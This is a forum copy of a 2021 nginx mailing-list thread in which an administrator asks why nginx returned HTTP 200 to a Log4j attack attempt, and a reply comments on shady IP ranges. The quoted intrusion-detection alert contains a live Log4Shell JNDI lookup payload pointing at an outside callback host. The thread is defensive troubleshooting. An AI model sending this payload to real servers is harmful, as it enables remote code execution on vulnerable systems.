Welcome! Log In Create A New Profile

Re: Help request about Log4j attack attempts and NGINX logs meaning

Forum List Message List New Topic Print View

gariac

December 29, 2021 12:06PM

Registered: 9 years ago
Posts: 178

That IP space is certified shady. I detect the occasional hack from them. See

https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/

and

https://wirelessdataspco.org/faq.php

These wireless companies will do anything for money including leasing their IP space.

I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them.

I will leave it up to the gurus to parse the log.

Original Message

From: mauro.tridici@cmcc.it
Sent: December 29, 2021 6:55 AM
To: nginx@nginx.org
Reply-to: nginx@nginx.org
Subject: Help request about Log4j attack attempts and NGINX logs meaning

Dear Users,

I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform.
Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks.
In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.

At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts.
Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.
Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.

Could you please help me to understand the reason why the NGINX server answer was “HTTP/1.1 200”!?

You can see below the mail notification I received:

Attack Notification.
2021 Dec 28 20:45:59

Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 166.137.252.110
Portion of the log(s):

166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"

Thank you in advance,
Mauro
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Reply Quote

RSS

Subject	Author	Posted
Help request about Log4j attack attempts and NGINX logs meaning	Mauro Tridici	December 29, 2021 09:56AM
Re: Help request about Log4j attack attempts and NGINX logs meaning	gariac	December 29, 2021 12:06PM
Re: Help request about Log4j attack attempts and NGINX logs meaning	Mauro Tridici	December 29, 2021 12:22PM
Re: [EXTERNAL] Re: Help request about Log4j attack attempts and NGINX logs meaning	Slaughter, Justin D	December 29, 2021 01:14PM
Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning	Mauro Tridici	December 29, 2021 01:32PM
Re: Help request about Log4j attack attempts and NGINX logs meaning	Maxim Dounin	December 29, 2021 01:32PM
Re: Help request about Log4j attack attempts and NGINX logs meaning	Mauro Tridici	December 29, 2021 01:36PM
Re: Help request about Log4j attack attempts and NGINX logs meaning	Maxim Konovalov	December 30, 2021 02:22AM
Re: Help request about Log4j attack attempts and NGINX logs meaning	Mauro Tridici	December 30, 2021 03:26AM
Re: Help request about Log4j attack attempts and NGINX logs meaning	gariac	December 30, 2021 04:22AM

Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 191

Record Number of Users: 8 on April 13, 2023

Record Number of Guests: 421 on December 02, 2018